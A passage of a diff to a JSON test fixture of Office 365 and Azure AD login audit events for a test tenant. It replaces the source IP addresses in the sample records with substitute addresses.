Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"3cbf15a5-84d0-4b0e-ba8e-c3ed43477293\",\"InterSystemsId\":\"8d662bc0-0011-424d-a7dc-56bfc5a142b4\",\"IntraSystemId\":\"d0a4e1ed-206d-4602-aaae-406a02c5c300\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:35\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"3cbf15a5-84d0-4b0e-ba8e-c3ed43477293\",\"InterSystemsId\":\"8d662bc0-0011-424d-a7dc-56bfc5a142b4\",\"IntraSystemId\":\"d0a4e1ed-206d-4602-aaae-406a02c5c300\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -3137,10 +3137,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ApplicationId": "00000002-0000-0ff1-ce00-000000000000", "AzureActiveDirectoryEventType": 1, - "ClientIP": "79.159.10.151", + "ClientIP": "67.43.156.13", "CreationTime": "2020-02-12T21:38:35", "ExtendedProperties": [ { @@ -3190,7 +3190,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:36\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"d2bb7eae-bc6e-42d2-b270-a885ec626235\",\"InterSystemsId\":\"9270f20a-56f2-493e-b6a7-a859adcaf626\",\"IntraSystemId\":\"97aa710f-536f-44c8-a8d5-711dc55f5500\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:36\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"d2bb7eae-bc6e-42d2-b270-a885ec626235\",\"InterSystemsId\":\"9270f20a-56f2-493e-b6a7-a859adcaf626\",\"IntraSystemId\":\"97aa710f-536f-44c8-a8d5-711dc55f5500\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -3208,10 +3208,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "00000002-0000-0ff1-ce00-000000000000", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:13:36", "ExtendedProperties": [ { @@ -3261,7 +3261,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T10:51:49\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"03de6d95-b955-451c-8311-473b6853d774\",\"InterSystemsId\":\"97c52753-c410-438f-89e2-22741e5ccc6a\",\"IntraSystemId\":\"c9ef5d5f-e3af-4669-b465-921d8b58bd00\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:51:49\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"03de6d95-b955-451c-8311-473b6853d774\",\"InterSystemsId\":\"97c52753-c410-438f-89e2-22741e5ccc6a\",\"IntraSystemId\":\"c9ef5d5f-e3af-4669-b465-921d8b58bd00\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -3279,10 +3279,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "79.159.10.151", + "ClientIP": "67.43.156.13", "CreationTime": "2020-02-12T10:51:49", "ExtendedProperties": [ { @@ -3332,7 +3332,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"e48d4214-364e-4731-b2b6-47dabf529218\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:43:37\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"ac8fcffb-7c44-498d-ad6b-24b85a3a1b59\",\"InterSystemsId\":\"9e0a494b-0db0-4481-a70e-eea6124b7018\",\"IntraSystemId\":\"e7a84bcf-41ff-4953-8e99-fb1820685f00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000004-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000004-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"e48d4214-364e-4731-b2b6-47dabf529218\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:37\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"ac8fcffb-7c44-498d-ad6b-24b85a3a1b59\",\"InterSystemsId\":\"9e0a494b-0db0-4481-a70e-eea6124b7018\",\"IntraSystemId\":\"e7a84bcf-41ff-4953-8e99-fb1820685f00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000004-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000004-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -3350,10 +3350,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "e48d4214-364e-4731-b2b6-47dabf529218", "AzureActiveDirectoryEventType": 1, - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-07T16:43:37", "ExtendedProperties": [ { @@ -3403,7 +3403,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:36\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"880fb7bc-5708-42d1-86a8-760c32ac5e6b\",\"InterSystemsId\":\"9fc4af4c-bf19-4f88-92ac-0fd029ca21bd\",\"IntraSystemId\":\"56fa424b-64bd-4ea5-abc4-38256f8a5600\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:36\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"880fb7bc-5708-42d1-86a8-760c32ac5e6b\",\"InterSystemsId\":\"9fc4af4c-bf19-4f88-92ac-0fd029ca21bd\",\"IntraSystemId\":\"56fa424b-64bd-4ea5-abc4-38256f8a5600\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -3421,10 +3421,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:13:36", "ExtendedProperties": [ { @@ -3474,7 +3474,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T21:38:37\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"30c7afcc-f74d-4b5a-898e-ce72da9386b8\",\"InterSystemsId\":\"a35e980b-88be-4343-9691-629473e01983\",\"IntraSystemId\":\"78a2aa65-5026-4124-970a-00e06dc7df00\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:37\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"30c7afcc-f74d-4b5a-898e-ce72da9386b8\",\"InterSystemsId\":\"a35e980b-88be-4343-9691-629473e01983\",\"IntraSystemId\":\"78a2aa65-5026-4124-970a-00e06dc7df00\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -3492,10 +3492,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "79.159.10.151", + "ClientIP": "67.43.156.13", "CreationTime": "2020-02-12T21:38:37", "ExtendedProperties": [ { @@ -3545,7 +3545,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-06T09:28:00\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"d4f90f07-f5c4-4b36-a81c-6c9bae8660d6\",\"InterSystemsId\":\"a89e9b3b-b394-4ecf-8abc-a3f6aaf9237f\",\"IntraSystemId\":\"bfe22fb6-c763-4972-91a7-5b13d3d51400\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-06T09:28:00\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"d4f90f07-f5c4-4b36-a81c-6c9bae8660d6\",\"InterSystemsId\":\"a89e9b3b-b394-4ecf-8abc-a3f6aaf9237f\",\"IntraSystemId\":\"bfe22fb6-c763-4972-91a7-5b13d3d51400\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ 